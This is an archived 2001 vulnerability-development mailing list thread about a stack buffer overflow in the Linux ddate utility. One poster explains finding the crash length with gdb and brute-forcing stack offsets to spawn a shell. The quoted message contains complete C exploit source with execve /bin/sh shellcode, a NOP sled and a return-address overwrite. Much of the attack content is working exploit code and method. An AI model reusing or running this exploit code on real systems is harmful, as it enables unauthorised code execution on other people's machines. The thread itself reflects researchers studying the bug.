Vulnerability Development mailing list archives
Re: ddate buffer overflow
From: "enthh () FLASH NET" <enthh () FLASH NET>
Date: Sun, 11 Feb 2001 14:19:50 -0500
I wrote the exploit for my slackware 7.0.0 , im not even sure which version of ddate it is. I tried adding A's from 300 until i got a segmentation fault (at 410), and then I ran gdb. # gdb -c core /usr/bin/ddate (gdb) info r esp This gave me the esp, and from there I wrote the shellcode/outline for the exploit and brute forced the esp will offsets -4000 to 4000, incrementing by 1, thus dropping me into a /bin/bash shell. I then took the ret address from the working offset and made that the default. I haven't tried it on any box other than this Slackware 7.0.0, so Im sorry that I cant give you the specifics for your RedHat exploit.. Try doing it the long way... ----- Original Message ----- From: "s1gnal_9 " <s1gnal_9 () sunos com> To: <enthh () FLASH NET> Sent: 10 February, 2001 9:35 PM Subject: Re: ddate buffer overflow
Hi, I started to write a exploit for it minutes after it was posted too,
just for fun, knowing that it wasn't suid, I was wondering what distro you are running. I started to write one on a friends RH7 box, for me, I didnt get eip and ebp of 0x41414141 until I sent 447 A's after the +. So from their on i started to make it work, but it isn't executing on the stack... I've looked over it a bit, and I don't see what I did wrong...
Heres my little version... If you see my problem, I'd really appreciate a
reply... Thanks a lot.
/* I added 8 bytes to buf[] for the 8bytes that eip and esp take up */ #include <stdio.h> #include <string.h> #define OFFSETS 0 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc,char **argv) { char buf[455]; char buf2[456]; int offset; if(argc < 2) { offset = OFFSETS; } else { offset = atoi(argv[1]); } memset(buf,0x90,sizeof(buf)); memcpy(buf + sizeof(buf) - strlen(shellcode) - 8, shellcode, strlen(shellcode)); *(long *)&buf[455 - 4] = get_sp() - offset; strcpy(buf2, "+"); strcat(buf2, buf); execl("/usr/bin/ddate", "ddate", buf2, NULL); } -- _______________________________________________ Get your free email from http://sunos.com Powered by Instant Portal
Current thread:
- Re: ddate buffer overflow enthh () FLASH NET (Feb 11)